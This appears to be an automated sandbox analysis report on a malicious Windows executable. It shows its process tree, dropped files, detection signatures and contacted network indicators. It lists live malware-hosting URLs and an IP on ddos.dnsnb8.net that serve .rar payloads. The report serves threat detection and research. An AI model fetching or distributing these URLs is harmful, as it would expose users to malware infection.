Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1481747 Sample: LisectAVT_2403002B_366.exe Startdate: 25/07/2024 Architecture: WINDOWS Score: 100 64 ddos.dnsnb8.net 2->64 70 Found malware configuration 2->70 72 Malicious sample detected (through community Yara rule) 2->72 74 Antivirus detection for URL or domain 2->74 76 12 other signatures 2->76 9 LisectAVT_2403002B_366.exe 8 2->9         started        13 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe 3 2->13         started        15 Microsoft Corporation.exe 2->15         started        17 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe 2->17         started        signatures3 process4 file5 58 C:\Users\user\AppData\Local\Temp\server.exe, PE32 9->58 dropped 60 C:\Users\user\AppData\Local\Temp\RRqyIX.exe, PE32 9->60 dropped 62 C:\Users\...\LisectAVT_2403002B_366.exe.log, ASCII 9->62 dropped 90 Detected unpacking (changes PE section rights) 9->90 92 Detected unpacking (overwrites its own PE header) 9->92 94 Hides threads from debuggers 9->94 19 server.exe 1 20 9->19         started        24 RRqyIX.exe 16 9->24         started        26 RRqyIX.exe 13->26         started        28 RRqyIX.exe 15->28         started        signatures6 process7 dnsIp8 66 127.0.0.1 unknown unknown 19->66 44 C:\system.exe, PE32 19->44 dropped 46 C:\Windows\SysWOW64xplower.exe, PE32 19->46 dropped 48 C:\Users\user\Favoritesxplower.exe, PE32 19->48 dropped 56 11 other malicious files 19->56 dropped 78 Antivirus detection for dropped file 19->78 80 Detected unpacking (changes PE section rights) 19->80 82 Drops PE files to the document folder of the user 19->82 88 5 other signatures 19->88 30 netsh.exe 2 19->30         started        68 ddos.dnsnb8.net 44.221.84.105, 49711, 49712, 49723 AMAZON-AESUS United States 24->68 50 C:\Program Files\7-Zip\Uninstall.exe, PE32 24->50 dropped 52 C:\Program Files (x86)\AutoIt3\...\SciTE.exe, PE32 24->52 dropped 54 C:\Program Files (x86)\AutoIt3\...\MyProg.exe, MS-DOS 24->54 dropped 84 Machine Learning detection for dropped file 24->84 86 Infects executable files (exe, dll, sys, html) 24->86 32 WerFault.exe 22 16 24->32         started        34 cmd.exe 26->34         started        36 cmd.exe 28->36         started        file9 signatures10 process11 process12 38 conhost.exe 30->38         started        40 conhost.exe 34->40         started        42 conhost.exe 36->42         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
44.221.84.105
 ddos.dnsnb8.net United States
14618 AMAZON-AESUS false

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
ddos.dnsnb8.net 44.221.84.105 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://ddos.dnsnb8.net:799/cj//k3.rar true
  • URL Reputation: malware
 unknown
http://ddos.dnsnb8.net:799/cj//k2.rar true
  • URL Reputation: malware
 unknown
http://ddos.dnsnb8.net:799/cj//k5.rar false
  • Avira URL Cloud: malware
 unknown
http://ddos.dnsnb8.net:799/cj//k1.rar true
  • URL Reputation: malware
 unknown
http://ddos.dnsnb8.net:799/cj//k4.rar false
  • Avira URL Cloud: phishing
 unknown